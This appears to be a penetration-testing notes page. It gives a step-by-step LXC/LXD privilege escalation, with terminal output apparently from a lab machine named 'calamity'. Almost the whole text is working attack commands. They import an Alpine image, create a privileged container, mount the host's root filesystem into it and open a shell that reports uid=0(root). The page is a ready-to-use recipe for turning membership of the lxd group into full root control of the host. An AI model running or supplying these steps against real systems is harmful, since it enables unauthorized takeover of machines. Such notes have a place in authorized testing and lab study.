LXC Privesc
Install LXC/LXD (Ubuntu)
apt install lxd lxc lxc-client
Get alpine tar file from github:
git clone https://github.com/saghul/lxd-alpine-builder
xalvas@calamity:~/.self$ lxc image import alpine-v3.10-i686-20190823_0134.tar.gz --alias alpine
Image imported with fingerprint: cb4eb6edd08c165f8f603b951cd20e81cbaa79b73ad20b98bacfe747f96a8b11
xalvas@calamity:~/.self$ lxc image list
+--------+--------------+--------+-------------------------------+------+--------+----------------
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+--------+--------------+--------+-------------------------------+------+--------+----------------
| alpine | cb4eb6edd08c | no | alpine v3.10 (20190823_01:34) | i686 | 3.07MB | Aug 23, 2019 at 5:36am (UTC) |
+--------+--------------+--------+-------------------------------+------+--------+----------------
xalvas@calamity:~/.self$ lxc init alpine privesc -c security.privileged=true
Creating privesc
xalvas@calamity:~/.self$ lxc list
+---------+---------+------+------+------------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+---------+---------+------+------+------------+-----------+
| privesc | STOPPED | | | PERSISTENT | 0 |
+---------+---------+------+------+------------+-----------+
xalvas@calamity:~/.self$ lxc config device add privesc host-root disk source=/ path=/mnt/root/
Device host-root added to privesc
xalvas@calamity:~/.self$ lxc start privesc
xalvas@calamity:~/.self$ lxc list
+---------+---------+------+------+------------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+---------+---------+------+------+------------+-----------+
| privesc | RUNNING | | | PERSISTENT | 0 |
+---------+---------+------+------+------------+-----------+
xalvas@calamity:~/.self$ lxc exec privesc /bin/sh
~ # id
uid=0(root) gid=0(root)
Last updated